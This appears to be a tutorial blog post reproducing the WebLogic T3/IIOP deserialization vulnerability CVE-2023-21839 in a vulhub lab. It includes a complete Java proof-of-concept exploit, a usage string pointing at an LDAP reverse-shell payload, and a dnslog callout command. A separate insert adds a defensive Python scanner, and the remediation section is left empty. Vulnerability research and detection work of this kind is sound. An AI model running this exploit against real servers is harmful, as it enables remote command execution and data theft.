TutorialBoy

WebLogic Deserialization Vulnerability - CVE-2023-21839

Introduction

WebLogic is an application server produced by Oracle Corporation in the United States. More precisely, it is middleware based on the Java EE architecture: a Java application server for developing, integrating, deploying, and managing large-scale distributed web applications, network applications, and database applications.

Vulnerability Overview

CVE-2023-21839

Because of flaws in WebLogic's handling of the IIOP/T3 protocols, when IIOP/T3 is enabled an unauthenticated attacker with network access over IIOP/T3 can attack WebLogic Server. After a successful attack, the WebLogic Server may be taken over by the attacker to execute arbitrary commands, resulting in a server crash or severe leakage of sensitive data.

Affected Versions

  • WebLogic 12.2.1.3.0
  • WebLogic 12.2.1.4.0
  • WebLogic 14.1.1.0.0

Environment

You can use vulhub to build a vulnerability environment:

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

Clone the project:

git clone https://github.com/vulhub/vulhub.git

In the weblogic/CVE-2023-21839/ directory of the cloned project, use the following command to download and start WebLogic version 12.2.1.3:

docker-compose up -d

Then visit http://your-ip:7001/console to see the login page.


Vulnerability Reproduction

You can use DXask88MA's tool:

weblogic.deployment.jms.ForeignOpaqueReference.class


You can also use 4ra1n's tool, which simulates the data packets in Go:

weblogic.jndi.internal.ForeignOpaqueReference.class
POC:

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE="[*]java -jar Target ip:port ldap address\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    private static InitialContext getInitialContext(String url)throws NamingException
    {
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
    public static void main(String args[]) throws Exception {
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c=getInitialContext("t3://"+t3Url);
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
        try{
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }

    }
}

Download the JAR file and test directly with dnslog:

Execute the command:

java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test


Check dnslog: the request has been received, so the vulnerability is verified.
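
A defender-side counterpart to the check above, added here as an example and not part of the original post or of either tool: a heuristic scanner that flags a plaintext T3 payload in which one of the ForeignOpaqueReference classes named above appears together with a remote JNDI name. It assumes the object travels as standard Java serialization, so class names and strings are length-prefixed text; the helper names, the URL scheme list and the sample bytes are constructed for illustration.

```python
import re
import struct

# Class names come from the article; the URL schemes are an assumption.
SUSPECT_CLASSES = {
    "weblogic.deployment.jms.ForeignOpaqueReference",
    "weblogic.jndi.internal.ForeignOpaqueReference",
}
REMOTE_JNDI = re.compile(r"^(ldaps?|rmi|iiop)://", re.I)
TC_CLASSDESC, TC_STRING = 0x72, 0x74  # Java serialization type codes

def java_strings(payload: bytes):
    """Yield (type_code, text) for each length-prefixed printable string
    that follows a TC_CLASSDESC or TC_STRING marker."""
    i = 0
    while i + 3 <= len(payload):
        code = payload[i]
        if code in (TC_CLASSDESC, TC_STRING):
            (length,) = struct.unpack_from(">H", payload, i + 1)
            raw = payload[i + 3 : i + 3 + length]
            if length and len(raw) == length and all(0x20 <= b < 0x7F for b in raw):
                yield code, raw.decode("ascii")
                i += 3 + length
                continue
        i += 1

def inspect(payload: bytes) -> dict:
    """Alert only when a suspect class and a remote JNDI name co-occur."""
    classes, urls = [], []
    for code, text in java_strings(payload):
        if code == TC_CLASSDESC and text in SUSPECT_CLASSES:
            classes.append(text)
        elif code == TC_STRING and REMOTE_JNDI.match(text):
            urls.append(text)
    return {"classes": classes, "urls": urls, "alert": bool(classes and urls)}

def utf(code: int, text: str) -> bytes:
    """Build one marker + 2-byte length + text record for the samples."""
    data = text.encode("ascii")
    return bytes([code]) + struct.pack(">H", len(data)) + data

# Constructed samples (not captured traffic): header, class descriptor, string.
HEADER = b"\xac\xed\x00\x05\x73"
SAMPLE = (HEADER + utf(TC_CLASSDESC, "weblogic.deployment.jms.ForeignOpaqueReference")
          + b"\x00" * 8 + utf(TC_STRING, "ldap://collector.example.invalid/test"))
BENIGN = HEADER + utf(TC_CLASSDESC, "java.util.Hashtable") + utf(TC_STRING, "jms/queue")

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

Traffic on t3s is TLS-encrypted, so run this over decrypted or plaintext captures, and treat a hit as a lead to confirm against server logs rather than as proof.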


Remediation

Reference link:
